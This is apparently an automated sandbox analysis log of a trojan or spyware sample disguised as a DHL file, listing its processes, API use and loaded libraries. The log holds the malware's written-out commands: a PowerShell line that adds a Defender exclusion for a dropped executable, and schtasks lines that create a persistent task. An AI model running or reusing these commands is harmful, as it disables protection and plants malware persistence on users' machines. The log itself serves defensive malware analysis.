Source: DHL_1003671162.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: qmUxKv.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, v9Lsz.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, VFo.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, 5FJ0H20tobu.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, NtdoTGO.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, XBsYgp.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, AwxUa2Na.cs, Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, 19C9FfZ.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, 19C9FfZ.cs, Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, soCD8XkwU.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs, Security API names: _0020.SetAccessControl
Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs, Security API names: _0020.AddAccessRule
Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, piTvKODFSX0jcR75aU.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs, Security API names: _0020.SetAccessControl
Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs, Security API names: _0020.AddAccessRule
Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, piTvKODFSX0jcR75aU.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@29/16@1/1
Source: C:\Users\user\Desktop\DHL_1003671162.exe, File created: C:\Users\user\AppData\Roaming\qmUxKv.exe
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:1432:120:WilError_03
Source: C:\Users\user\Desktop\DHL_1003671162.exe, File created: C:\Users\user\AppData\Local\Temp\tmp3999.tmp
Source: DHL_1003671162.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\DHL_1003671162.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\DHL_1003671162.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\DHL_1003671162.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\DHL_1003671162.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DHL_1003671162.exe, Virustotal: Detection: 57%
Source: DHL_1003671162.exe, ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\DHL_1003671162.exe, File read: C:\Users\user\Desktop\DHL_1003671162.exe:Zone.Identifier
Source: unknown, Process created: C:\Users\user\Desktop\DHL_1003671162.exe "C:\Users\user\Desktop\DHL_1003671162.exe"
Source: C:\Users\user\Desktop\DHL_1003671162.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_1003671162.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_1003671162.exe, Process created: C:\Users\user\Desktop\DHL_1003671162.exe "C:\Users\user\Desktop\DHL_1003671162.exe"
Source: unknown, Process created: C:\Users\user\AppData\Roaming\qmUxKv.exe C:\Users\user\AppData\Roaming\qmUxKv.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, Process created: C:\Users\user\AppData\Roaming\qmUxKv.exe "C:\Users\user\AppData\Roaming\qmUxKv.exe"
Source: unknown, Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp6C70.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Source: unknown, Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Source: C:\Windows\System32\conhost.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe, Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp"
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: rsaenh.dll
